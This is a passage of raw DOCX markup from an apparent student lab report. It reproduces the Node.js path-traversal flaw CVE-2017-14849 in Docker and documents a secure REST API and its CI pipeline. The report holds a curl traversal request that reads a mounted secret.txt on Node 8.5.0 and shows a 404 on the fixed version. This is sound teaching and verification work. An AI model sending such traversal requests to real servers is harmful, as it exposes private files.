          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Fig. 2  An earlier run of the same workflow: run #1 finished with status Success in 13 s. The annotation in the lower part is the SAST finding for src/security.js:78. The latest run is linked in section 2.1.</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80" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The scenario runs in Docker, which is what the manual expects: the vulhub application is built into an image on the official node base image, and two images differ only in the runtime tag. The first run uses node:8.5.0, the second node:8.6.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t># cve/CVE-2017-14849/docker-compose.yml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>services:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">  node:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    build: .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    volumes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">      - ./www:/usr/src/www</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">      - ./secret.txt:/usr/src/secret.txt:ro</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    ports:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">      - "3000:3000"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The attack target is mounted into both images rather than copied into them. That is deliberate: if only the vulnerable image contained secret.txt, a 404 on the fixed image would prove nothing, because the file might simply be missing. Mounting it in both runs leaves the Node.js version as the only variable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ docker compose up -d --build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ docker compose exec node node --version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>v8.5.0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'http://127.0.0.1:3000/static/../foo/../../secret.txt'</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the traversal succeeds inside the container running Node 8.5.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Both runs were executed by `cve/CVE-2017-14849/verify-docker.ps1`, which builds each image, waits until the application actually answers HTTP 200, issues the requests and writes the whole session to `cve/CVE-2017-14849/docker-evidence.txt` in the repository. That transcript is the raw evidence; the figures below show the same requests against the same application on the native runtime, where a window capture was possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The same request against the fixed image, built from the same application and the same mounted files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ docker compose -f docker-compose.fixed.yml up -d --build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ docker compose -f docker-compose.fixed.yml exec node node --version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>v8.6.0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http://127.0.0.1:3000/static/../foo/../../secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>404</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ curl --path-as-is -s -o /dev/null -w '%{http_code}' http://127.0.0.1:3000/static/main.js</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identical request, fixed runtime — rejected, and normal requests are still served. Full transcript in evidence/shot-docker and docker-evidence.txt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Before Docker was available on this machine the same result was obtained natively, by running the official Node.js 8.5.0 build directly; that path is kept in the repository as a fallback because it needs no container runtime at all.</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keepNext/>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5544000" cy="3908066"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="shot-2-exploit.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>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3  CVE-2017-14849 reproduced on Node.js 8.5.0. The traversal request returns HTTP 200 and the contents of a file stored two levels above the served directory.</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keepNext/>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5544000" cy="3908066"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="shot-3-fixed.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>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4  Proof of elimination: the identical request against the fixed runtime returns HTTP 404, while GET /static/main.js and GET / still return HTTP 200 (regression).</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and relies on the CVE reproduction for the dynamic side.</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On this machine Docker was unavailable, and the native reproduction needed extra care with path semantics and a temporary interpreter directory — a practical illustration of the same point.</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Two limitations are worth recording. The first reproduction of this vulnerability was made natively, because Docker was not installed on the machine at that time; it was repeated in Docker afterwards, and both runs give the same result — section 5.3 reports the container run, which is what the manual asks for. The second is that the repository history was created with git only after the working tree was complete, so the commits do not show the development process itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Appendix A. README.md (verbatim)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The submission checklist requires the report to contain the text of README.md from the repository. It is reproduced below exactly as committed, without reformatting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t># Secure Notes API — Information Security Lab, Work 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 small REST API built to demonstrate the OWASP Top 10 defences required by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>Work 1, together with a CI/CD pipeline that runs static analysis (SAST) and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>dependency analysis (SCA) on every push, and a reproduction of a real CVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>(**CVE-2017-14849**) with root-cause analysis, fix and verification.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Work: **1 — Secure REST API Development with CI/CD and Real CVE Vulnerability Analysis**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>* Variant: **0**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>* Author: Wang Ruilin, 22320110, HDU-ITMO Joint Institute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Contents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[Stack](#1-stack)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>2. [Quick start](#2-quick-start)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>3. [API reference](#3-api-reference)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>4. [Security measures](#4-security-measures)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>5. [CI/CD pipeline and scan results](#5-cicd-pipeline-and-scan-results)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>6. [CVE analysis](#6-cve-analysis-cve-2017-14849)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>7. [Repository layout](#7-repository-layout)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Stack</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Language | JavaScript (Node.js) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Framework | Express 4.21 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Database | SQLite through the **built-in** `node:sqlite` module |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Auth | JWT (HS256) + bcrypt password hashes |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Runtime requirement | **Node.js &gt;= 22.5** (for `node:sqlite`)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`node:sqlite` is part of the runtime, so the project has **no native build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>step** — `npm ci` works on any machine without a C++ toolchain. Every SQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>statement in the project is a prepared statement.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Express 4 was chosen over 5 for ecosystem maturity; `helmet`, `express.json`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>with a body size limit, and an explicit error handler are all wired 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Quick start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npm ci                # install dependencies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>npm run seed          # create demo users (alice, bob, admin) and one note</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>npm start             # http://127.0.0.1:3000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npm test              # 14 automated checks, in-memory database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>npm run audit         # SCA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>npx eslint src scripts  # SAST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Environment variables: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Variable | Default | Notes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`PORT` | `3000` | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| `JWT_SECRET` | dev fallback | **required** when `NODE_ENV=production`, the process refuses to start otherwise |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| `DB_PATH` | `data/app.db` | use `:memory:` in tests |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
